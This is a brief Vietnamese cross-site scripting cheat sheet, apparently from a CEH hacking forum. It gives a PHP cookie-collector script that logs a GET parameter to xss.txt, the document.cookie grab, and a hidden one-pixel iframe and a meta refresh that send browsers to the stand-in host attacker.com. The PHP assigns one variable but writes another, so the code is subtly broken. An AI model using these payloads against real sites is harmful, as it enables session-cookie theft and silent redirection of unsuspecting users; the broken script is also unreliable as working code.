cookie.php
[$coo = $_GET['c']; $f = fopen("xss.txt","a"); fputs($f, $cook.chr(13)); fclose($f);]
a. Lấy cookie
[document.cookie]
b. Chuyển hướng trình duyệt
[iframe src='http://www.attacker.com' width='1' height='1' style='visibility; hidden;']
[meta http-equiv="Refresh" content="0;url=http://www.attacker.com"]
(http://ceh.vn/@4rum)
